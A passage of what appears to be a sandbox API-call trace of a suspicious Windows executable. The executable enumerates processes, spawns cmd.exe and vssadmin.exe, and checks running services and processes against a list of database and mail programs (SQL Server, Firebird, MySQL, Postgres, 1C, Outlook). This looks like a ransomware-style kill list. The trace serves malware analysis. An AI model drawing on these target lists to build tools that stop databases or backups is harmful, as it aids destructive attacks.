lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0051.596] lstrlenW (lpString="ivttvf.exe") returned 10 [0051.596] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa90, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0051.597] lstrlenW (lpString="cmd.exe") returned 7 [0051.597] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0051.598] lstrlenW (lpString="conhost.exe") returned 11 [0051.598] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0051.599] lstrlenW (lpString="vssadmin.exe") returned 12 [0051.599] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0051.599] lstrlenW (lpString="VSSVC.exe") returned 9 [0051.600] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.600] lstrlenW (lpString="svchost.exe") returned 11 [0051.600] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0051.601] CloseHandle (hObject=0x1e4) returned 1 [0051.601] Sleep (dwMilliseconds=0x1f4) [0052.398] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6645b8 [0052.399] EnumServicesStatusExW (in: hSCManager=0x6645b8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0052.399] GetLastError () returned 0xea [0052.399] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x12c6) returned 0x3f740a8 [0052.399] EnumServicesStatusExW (in: hSCManager=0x6645b8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3f740a8, cbBufSize=0x12c6, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3f740a8, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0052.400] CloseServiceHandle (hSCObject=0x6645b8) returned 1 [0052.400] lstrlenW (lpString="Appinfo") returned 7 [0052.400] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0052.400] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0052.400] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0052.400] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0052.400] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0052.400] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0052.400] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0052.400] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0052.400] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0052.400] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0052.400] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0052.400] lstrlenW (lpString="AudioSrv") returned 8 [0052.400] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0052.400] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0052.400] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0052.400] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0052.400] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0052.401] lstrlenW (lpString="BFE") returned 3 [0052.401] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0052.401] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0052.401] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0052.401] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0052.401] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0052.401] lstrlenW (lpString="CryptSvc") returned 8 [0052.401] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0052.401] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0052.401] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0052.401] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0052.401] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0052.401] lstrlenW (lpString="CscService") returned 10 [0052.401] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0052.401] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0052.401] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0052.401] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0052.401] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0052.401] lstrlenW (lpString="DcomLaunch") returned 10 [0052.401] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0052.401] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0052.401] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0052.401] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0052.401] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0052.401] lstrlenW (lpString="Dhcp") returned 4 [0052.401] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0052.401] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0052.401] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0052.401] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0052.401] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0052.401] lstrlenW (lpString="Dnscache") returned 8 [0052.401] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0052.402] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0052.402] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0052.402] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0052.402] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0052.402] lstrlenW (lpString="DPS") returned 3 [0052.402] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0052.402] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0052.402] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0052.402] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0052.402] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0052.402] lstrlenW (lpString="eventlog") returned 8 [0052.402] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0052.402] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0052.402] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0052.402] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0052.402] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0052.402] lstrlenW (lpString="EventSystem") returned 11 [0052.402] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0052.402] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0052.402] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0052.402] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0052.402] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0052.402] lstrlenW (lpString="gpsvc") returned 5 [0052.402] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0052.402] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0052.402] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0052.402] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0052.402] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0052.402] lstrlenW (lpString="iphlpsvc") returned 8 [0052.402] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0052.402] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0052.402] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0052.402] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0052.402] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0052.403] lstrlenW (lpString="LanmanServer") returned 12 [0052.403] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0052.403] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0052.403] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0052.403] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0052.403] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0052.403] lstrlenW (lpString="LanmanWorkstation") returned 17 [0052.403] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0052.403] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0052.403] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0052.403] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0052.403] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0052.403] lstrlenW (lpString="lmhosts") returned 7 [0052.403] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0052.403] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0052.403] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0052.403] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0052.403] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0052.403] lstrlenW (lpString="MMCSS") returned 5 [0052.403] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0052.403] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0052.403] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0052.403] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0052.403] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0052.403] lstrlenW (lpString="MpsSvc") returned 6 [0052.403] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0052.403] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0052.403] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0052.403] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0052.403] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0052.403] lstrlenW (lpString="Netman") returned 6 [0052.403] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0052.403] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0052.403] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0052.404] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0052.404] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0052.404] lstrlenW (lpString="netprofm") returned 8 [0052.404] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0052.404] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0052.404] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0052.404] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0052.404] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0052.404] lstrlenW (lpString="NlaSvc") returned 6 [0052.404] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0052.404] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0052.404] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0052.404] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0052.404] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0052.404] lstrlenW (lpString="nsi") returned 3 [0052.404] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0052.404] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0052.404] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0052.404] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0052.404] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0052.404] lstrlenW (lpString="PcaSvc") returned 6 [0052.404] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0052.404] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0052.404] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0052.404] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0052.404] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0052.404] lstrlenW (lpString="PlugPlay") returned 8 [0052.404] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0052.404] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0052.404] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0052.404] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0052.404] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0052.404] lstrlenW (lpString="Power") returned 5 [0052.405] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0052.405] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0052.405] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0052.405] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0052.405] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0052.405] lstrlenW (lpString="ProfSvc") returned 7 [0052.405] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0052.405] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0052.405] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0052.405] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0052.405] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0052.405] lstrlenW (lpString="RpcEptMapper") returned 12 [0052.405] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0052.405] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0052.405] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0052.405] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0052.405] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0052.405] lstrlenW (lpString="RpcSs") returned 5 [0052.405] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0052.405] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0052.405] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0052.405] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0052.405] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0052.405] lstrlenW (lpString="SamSs") returned 5 [0052.405] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0052.405] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0052.405] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0052.405] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0052.405] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0052.405] lstrlenW (lpString="Schedule") returned 8 [0052.405] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0052.405] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0052.405] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0052.406] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0052.406] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0052.406] lstrlenW (lpString="SENS") returned 4 [0052.406] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0052.406] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0052.406] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0052.406] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0052.406] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0052.406] lstrlenW (lpString="ShellHWDetection") returned 16 [0052.406] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0052.406] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0052.406] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0052.406] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0052.406] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0052.406] lstrlenW (lpString="Spooler") returned 7 [0052.406] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0052.406] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0052.406] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0052.406] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0052.406] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0052.406] lstrlenW (lpString="swprv") returned 5 [0052.406] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0052.406] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0052.406] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0052.406] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0052.406] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0052.406] lstrlenW (lpString="SysMain") returned 7 [0052.406] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0052.406] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0052.406] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0052.406] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0052.406] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0052.406] lstrlenW (lpString="Themes") returned 6 [0052.406] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0052.407] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0052.407] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0052.407] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0052.407] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0052.407] lstrlenW (lpString="TrkWks") returned 6 [0052.407] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0052.407] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0052.407] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0052.407] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0052.407] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0052.407] lstrlenW (lpString="UxSms") returned 5 [0052.407] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0052.407] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0052.407] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0052.407] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0052.407] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0052.407] lstrlenW (lpString="VSS") returned 3 [0052.407] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0052.407] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0052.407] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0052.407] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0052.407] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0052.407] lstrlenW (lpString="WdiServiceHost") returned 14 [0052.407] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0052.407] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0052.407] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0052.407] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0052.407] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0052.407] lstrlenW (lpString="WdiSystemHost") returned 13 [0052.407] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0052.407] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0052.407] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0052.407] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0052.407] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0052.408] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0052.408] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0052.408] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0052.408] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0052.408] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0052.408] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0052.408] lstrlenW (lpString="Winmgmt") returned 7 [0052.408] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0052.408] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0052.408] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0052.408] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0052.408] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0052.408] lstrlenW (lpString="WPDBusEnum") returned 10 [0052.408] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0052.408] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0052.408] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0052.408] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0052.408] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0052.408] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3f740a8 | out: hHeap=0x570000) returned 1 [0052.408] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x214 [0052.411] Process32FirstW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0052.411] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0052.412] lstrlenW (lpString="System") returned 6 [0052.412] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0052.412] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0052.412] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0052.412] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0052.412] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0052.412] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0052.412] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0052.412] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0052.413] 